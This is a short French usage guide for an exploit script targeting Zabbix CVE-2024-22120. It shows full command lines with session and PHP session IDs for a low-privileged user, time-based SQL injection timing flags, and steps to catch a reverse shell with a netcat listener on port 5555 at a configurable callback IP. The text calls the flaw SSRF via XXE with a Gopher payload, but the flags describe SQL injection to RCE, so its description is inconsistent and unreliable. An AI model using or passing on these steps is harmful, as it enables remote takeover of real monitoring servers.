
Ceci est mon exploit pour CVE-2024-22120, qui implique une vulnérabilité SSRF dans une XXE avec une charge utile Gopher.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Vous avez identifié un serveur Zabbix fonctionnant sur l'adresse IP 192.168.1.100, et vous avez accès à un utilisateur avec des privilèges limités possédant les informations suivantes :
sid) : d82bf6715e1d3c1f25hostid) : 10107phpsessid) : a4g7f48d9j3r7h8s9gVous souhaitez exploiter la vulnérabilité RCE à l'aide de ce script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100 : L'adresse IP du serveur Zabbix.--sid d82bf6715e1d3c1f25 : L'ID de session d'un utilisateur avec des privilèges limités.--hostid 10107 : L'ID d'un hôte auquel l'utilisateur avec des privilèges limités peut accéder.--phpsessid a4g7f48d9j3r7h8s9g : L'ID de session PHP utilisé pour authentifier les requêtes.--false_time 1 : Temps en secondes d'attente en cas de mauvaise supposition lors de l'injection SQL (par défaut 1 seconde).--true_time 3 : Temps en secondes d'attente en cas de bonne supposition lors de l'injection SQL (par défaut 3 secondes).10.0.46.27:5555 dans le script).Assurez-vous que votre machine écoute sur le port spécifié (5555 dans le script) pour capturer le reverse shell. Vous pouvez utiliser netcat pour cela :
nc -lvnp 5555
Remplacez l'adresse IP 10.0.46.27 et le port 5555 dans la fonction CreateScript par votre propre adresse IP et le port souhaité pour recevoir le reverse shell.